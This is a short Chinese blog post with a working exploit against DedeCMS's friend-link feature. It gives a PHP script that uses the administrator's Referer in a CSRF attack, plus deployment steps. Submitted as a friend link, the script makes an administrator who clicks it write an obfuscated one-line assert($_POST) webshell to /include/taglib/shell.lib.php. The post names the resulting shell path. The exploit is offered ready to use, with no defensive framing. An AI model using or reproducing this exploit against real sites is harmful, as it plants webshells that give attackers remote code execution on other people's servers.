dede 友链 getshell

| 热度 | 字数统计: 109 字 | 阅读时长: 1 分

csrf getshell

Exp

1
2
3
4
5
6
7
8
9
10
11
12
<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);
$muma = '<'.'?'.'a'.'s'.'s'.'e'.'r'.'t'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'a'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

将 exp 部署在服务器上

申请链接

/plus/flink.php

添加链接 网站填上 exp 的链接

1.jpg

之后等待管理员触发

shell 地址

/include/taglib/shell.lib.php

本文标题:dede 友链 getshell

文章作者:X1r0z

发布时间:2018年03月25日

原始链接:https://exp10it.cn/2018/03/25/2018-03-25-dede-flink-csrf-getshell/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者.